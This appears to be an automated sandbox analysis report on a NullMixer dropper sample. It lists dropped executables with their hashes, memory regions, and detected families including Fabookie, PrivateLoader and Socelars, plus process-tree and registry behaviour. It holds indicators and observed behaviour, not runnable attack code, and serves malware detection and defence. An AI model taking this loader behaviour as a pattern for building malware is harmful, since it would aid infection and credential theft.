C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe

MD5 cf7a094bc477eeba7e8d568f12bf0ba9
SHA1 4b9bca3bd6d3d1125dbd13993d0c4118e479ae79
SHA256 4960c14c5b5a9d4abf64ef2cf3d2357403ad7ab5173bf5f063f162557bbfe2e5
SHA512 f9e0579878f649f1588435c0bc8846d84058666aebd6f676b1e9ec51950375360b01333e073d7e7cdcbe683f78bb6de7f945d8e2d3290ba9dd4512480e6d25da

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe

MD5 0b8ef03e8c9752a88faa2907a62d0783
SHA1 283b229a5c68528363ab3595ea8b5b37025fb1ec
SHA256 63ddcac0ee5ecd7239cb817b176480275ad3f6fc9bfb1f4a3086d19e578da4ea
SHA512 bccb76031a7df528ebed8d3c33d5ea8f2bdd69858e26931e8ad348a3805fdfd9b377ae416c087fa6959c899fb17f9d1561773ac06aa6b803b8e73bc9832468ec

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

MD5 58267e9b25e8df4530d4e7b4e8b273c0
SHA1 bb08b8638013fd6ac7fb30f0d674a0ada0dab5ac
SHA256 dce7b289556aa5027cd166ce2916b0d25081377071c3428609f6368d1d26e1ef
SHA512 488f40ce734197fa4aa36bda91a9283ddabfc41117f367a3643bebecb6bb5f43e170c4804989a934fa3cc25d1a07559b1e1abf14d3efc0aacc3323280c3cbec3

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

MD5 ebf343da80ba03d41832a6f1178940f8
SHA1 06b5689406be75fe9b6ff3b6ba68d712f6597819
SHA256 85dfc3e1c3748a6a48b0b1b34df6853d68e26ce12c13463a9b0f2cc899260bd5
SHA512 5c971e9eccc7bcca8a77c46ba7f9ff1765eecf243146f805eb90809e3bd28e4b4038150bf7f95fa19ea5b90f77af5c1f4916093df13b3b732dff8aeee68755c4

\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe

MD5 917921d15cb0e081cc589fb8623cbfdc
SHA1 a8c5dc84e100aea9c9de8b2e76c6469d0de8c747
SHA256 c2496991fe4a847ed5585f00e8fdf2dc9fc679636f5e9e4add9086649bb24717
SHA512 8eff74f2ba55392c0bb33159aa367cccede62eda00c0ef03b2f05ee42cdeb41341f780c6757b997b87a0e2336e3f31135b24b72865d69e449623a230a781d3ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 6c41d65cc641e21398d68075326c9a5e
SHA1 946ac9b57ed3076ed9e9ec17c05a931a5f56bdd6
SHA256 972db3356bf538976e613b0c0c582472ea672cb8a0d5c2976ce9b546c4904036
SHA512 3c8e981d882267f67d52f54461f24312ed4adc97bc697938b816b3461f7b17e82c433693c6bf10669ec8f5b4bf4a9472ad9f741088750726a21bbf097d66b940

memory/2368-172-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-168-0x0000000002850000-0x0000000002F4D000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe

MD5 b33a3fb6b491b328dacaf18c302b20de
SHA1 41281e81ec9ba49af4af18f3c61038e62818d3c6
SHA256 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72
SHA512 a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e

memory/804-188-0x00000000011F0000-0x00000000018ED000-memory.dmp

memory/804-182-0x00000000011F0000-0x00000000018ED000-memory.dmp

memory/956-186-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1928-183-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2016-192-0x0000000001320000-0x0000000001388000-memory.dmp

memory/1508-194-0x0000000000E00000-0x0000000000E68000-memory.dmp

memory/1448-193-0x00000000000B0000-0x00000000000F2000-memory.dmp

memory/804-197-0x0000000000400000-0x0000000000AFD000-memory.dmp

memory/1784-201-0x00000000011D0000-0x00000000011D8000-memory.dmp

memory/1928-244-0x0000000000400000-0x0000000000414000-memory.dmp

memory/804-238-0x0000000000400000-0x0000000000AFD000-memory.dmp

memory/804-237-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/804-235-0x0000000003C80000-0x0000000003C81000-memory.dmp

memory/2836-245-0x0000000000400000-0x0000000000414000-memory.dmp

memory/804-232-0x0000000003000000-0x0000000003001000-memory.dmp

memory/804-230-0x0000000003000000-0x0000000003001000-memory.dmp

memory/804-227-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/804-225-0x0000000002F50000-0x0000000002F51000-memory.dmp

memory/804-222-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/804-220-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

memory/804-217-0x00000000029E0000-0x00000000029E1000-memory.dmp

memory/804-215-0x00000000029E0000-0x00000000029E1000-memory.dmp

memory/804-213-0x00000000029E0000-0x00000000029E1000-memory.dmp

memory/804-212-0x0000000000D00000-0x0000000000D01000-memory.dmp

memory/804-210-0x0000000000D00000-0x0000000000D01000-memory.dmp

memory/804-208-0x0000000000D00000-0x0000000000D01000-memory.dmp

memory/1948-243-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe

MD5 7d7f14a1b3b8ee4e148e82b9c2f28aed
SHA1 649a29887915908dfba6bbcdaed2108511776b5a
SHA256 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb
SHA512 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2860-108-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MAFVS.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2860-107-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2860-106-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2860-104-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2860-100-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ad13d7ad1b02.exe

MD5 6881c116d2a78c375de73a298a732427
SHA1 36112627325603afc821d28b2da69f7da58e27ab
SHA256 c15359f15f0402b2db3b3704d0bacee6996c04bc1f37195eb02ac30cf2fc5844
SHA512 598cc49d79c236f6fc493438cd103e367c477480adf10f279613767536762c67c1b712bb00fb620c535647f1e002d88d0cba60cab02ef602be8e7bc009c0d728

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe

MD5 34025b6eb0aa1236b91ca1ab765acbd3
SHA1 cfb12b89aa55158e7b0b38f8fd5b8bf590660793
SHA256 db3c03a5f74e0e9114883bb5c0db60abb4f32e4712e32a953179f0626c529b14
SHA512 d5d4cf4f3dcdc79ae92792307ee82922af55bdc4d81708c140c03c1979da3b8e2d0f009ddde6f680a0197ab7668824dab81393ba9bca6533a603eddd30e22fdd

memory/2860-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2860-78-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2860-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2860-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2860-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1448-260-0x0000000000450000-0x000000000047E000-memory.dmp

memory/316-275-0x0000000002320000-0x00000000027DA000-memory.dmp

memory/316-276-0x0000000001E60000-0x0000000001F0E000-memory.dmp

memory/316-280-0x0000000002C70000-0x0000000002D0B000-memory.dmp

memory/316-278-0x0000000002C70000-0x0000000002D0B000-memory.dmp

memory/316-277-0x0000000002C70000-0x0000000002D0B000-memory.dmp

memory/2132-293-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1868-311-0x0000000000400000-0x0000000000420000-memory.dmp

memory/804-319-0x0000000000400000-0x0000000000AFD000-memory.dmp

memory/804-321-0x00000000011F0000-0x00000000018ED000-memory.dmp

memory/1596-361-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

memory/3000-392-0x0000000000230000-0x0000000000238000-memory.dmp

memory/3000-391-0x0000000001220000-0x0000000001242000-memory.dmp

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDK23TBKX6BDNIQIPQ1Y.temp

MD5 293d0416bcda13e1649de81d3b609bb2
SHA1 0a43e1dd48c95a4b2ddfab5f34f4b7f8b1ed03c4
SHA256 1af6038dba0c86e9014d26c848d12d78d2739c786abb7fc0956536b210b8c196
SHA512 503945513122def7d71479b0bc6e822b32f924abae41f3ceda174693f408d99c3e3e32636015747e36ecddbee60844a9ca87817af3ab456ada34415fb80dabfb

memory/2756-442-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2756-447-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab454A.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar517B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 10:40

Reported

2024-11-06 10:43

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3956 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe
PID 3956 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe
PID 3956 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe
PID 1416 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 2264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 2264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4324 wrote to memory of 2264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1416 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
